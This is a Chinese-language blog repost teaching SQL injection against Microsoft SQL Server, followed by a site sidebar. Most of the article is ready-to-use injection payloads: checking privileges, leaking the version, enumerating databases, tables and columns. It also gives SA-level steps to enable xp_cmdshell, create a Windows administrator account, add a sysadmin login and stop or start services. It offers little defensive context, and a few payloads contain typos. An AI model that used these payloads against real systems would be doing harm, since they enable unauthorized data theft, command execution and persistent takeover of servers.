Sql注入之Mssql

其他 2020-02-17 12:50:52 阅读次数: 0

Sql注入之Mssql

数据库介绍

Mssql数据库是由微软公司开发的,中小型数据库,经常搭配asp使用。

数据库权限

  • sa权限:数据库操作,文件管理,命令执行,注册表读取等system
  • db权限:文件管理,数据库操作等users-administrators
  • public权限:数据库操作guest-users

判断数据库

and exsits (select * from sysobjects)>0

权限判断

and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
and 1=(select IS_SRVROLEMEMBER('db_owner'));--

版本判断

and 1=(select @@version)

原理解释:@@version查询到的为字符类型但是让它“=1”(转化为整数类型),就会报错输出@@version的信息。

拓展:

and 1=(select db_name())    #查询数据库名称

获取用户数据库名

系统一共自带4个数据库,用来记录数据库的一些信息。

这四个数据库分别用dbid=1,2,3,4来标记

  • 方法一
and 1=(select top 1 name from master..sysdatabases where dbid>4)

爆出一个库名假如为db,则运用如下语句可以继续爆库名

and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'db')

依次运用就可以爆出全部用户数据库名

  • 方法二

运用如下语句爆出第二个数据库名

and 1=(select top 1 name from master..sysdatabases where dbid>5)

爆出第三个数据库名

and 1=(select top 1 name from master..sysdatabases where dbid>6)

依次运用即可爆出全部库名

  • 方法三

运用如下命令可以爆出全部数据库名

and 1=(select name from mast..sysdatabases for xml path)

获取数据库表名

  • 方法一

xtype='U'表示查询的为表

and 1=(select top 1 name from sysobjects where xtype='U' )

假如爆出来的第一个表名为tables,运用如下语句爆出第二个表名

and 1=(select top 1 name from sysobjects where xtype='U'  and name<>tables)

依次运用爆出全部表名

  • 方法二

运用如下命令爆出全部表名

and 1=(select name from sysobjects for xml path)

获取列名

获取user表的列名

and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name='user'))
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name='user')and name<>id)

依次获取全部列名

SA扩展存储攻击

判断命令扩展是否存在
  • 判断是否可以使用xp_cmdshell

xtype=‘x’查询 扩展存储过程

and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')

开启扩展

EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
  • 判断xp_regread
and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')

开启

EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_regread',1;RECONFIGURE;
xp_cmdshell扩展应用

创建用户

exec master..xp_cmdshell'net user admin admin /add'

将用户加入管理员组

exec master..xp_cmdshell'net localgroup administrators admin /add'
其他
  • 添加一个SA权限的用户test:
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolememner test,sysadmin
  • 激活或停止某个服务
exec master..xp_servicecontrol 'stop',服务
exec master..xp_servicecontrol 'start',服务

猜你喜欢

转载自www.cnblogs.com/Wuser/p/12321174.html
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型
JS实现无缝滚动上
深入解析HashMap原理(基于JDK1.8)
mysql的连接池
关于.htc
linux下的ubuntu12.04图形界面
【数论】好推不好记的扩展欧几里德
设备树详解
cscope + tags 简单设置
xml学习
每日归档
更多
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022